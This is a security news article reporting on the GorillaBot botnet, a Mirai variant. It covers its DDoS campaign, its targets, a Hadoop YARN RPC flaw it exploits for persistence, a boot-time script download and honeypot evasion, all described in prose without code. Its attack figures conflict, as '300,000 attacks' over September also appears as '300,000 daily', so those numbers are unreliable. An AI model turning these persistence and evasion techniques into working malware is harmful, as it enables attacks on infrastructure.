GorillaBot reigns as DDoS king with 300,000+ commands

Home/BOTNET, Compromised, DDOS, Exploitation, Internet Security, Malware, Security Advisory, Security Update/GorillaBot reigns as DDoS king with 300,000+ commands

GorillaBot reigns as DDoS king with 300,000+ commands

The newly emerged Gorilla Botnet has launched over 300,000 DDoS attacks across 100+ countries from September 4 to 27.

A modified version of Mirai, it supports multiple CPU architectures and uses advanced techniques for long-term control of infected devices.

GorillaBot reigns as DDoS king

The botnet employs encryption algorithms used by the KekSec group to hide key information, showcasing its sophistication and evasiveness.

Gorilla Botnet targets critical infrastructure like universities, government sites, telecoms, and banks, showing its potential for major disruption.

A notorious DDoS botnet launched over 300,000 attacks daily in September 2024, targeting victims in 113 countries using UDP Flood attacks.

China, the U.S., Canada, and Germany were heavily impacted, especially critical infrastructure organizations.

The botnet’s persistent targeting and use of proven methods pose a serious threat to global online services and infrastructure.

The GorillaBot trojan, a variant of Mirai, supports multiple architectures and connects randomly to one of five C&C servers for commands.

It offers a broader range of DDoS attack methods, including UDP, TCP, GRE, and specialized attacks on protocols like OpenVPN, Discord, and FiveM.

NSFOCUS analysis shows that GorillaBot uses encryption favored by the KekSec group to protect data, and the presence of lol.sh in its code suggests a possible link to KekSec.

This raises suspicions that GorillaBot may be connected to KekSec or using its methods to hide its origin.

GorillaBot shows greater persistence than typical Mirai botnets by using the “yarn_init” function to exploit a Hadoop YARN RPC vulnerability for high privileges.

To maintain operation, it creates a service file for automatic startup and tries to download a malicious script (“lol.sh”) at boot, user login, or through custom scripts.

Notably, the bot avoids honeypots by checking for the “/proc” filesystem first.

‍Follow Us on: Twitter, InstagramFacebook to get the latest security news!

By | 2024-11-05T23:48:47+05:30 October 1st, 2024|BOTNET, Compromised, DDOS, Exploitation, Internet Security, Malware, Security Advisory, Security Update|

About the Author:

FirstHackersNews- Identifies Security

Leave A Comment

Subscribe to our newsletter to receive security tips everday!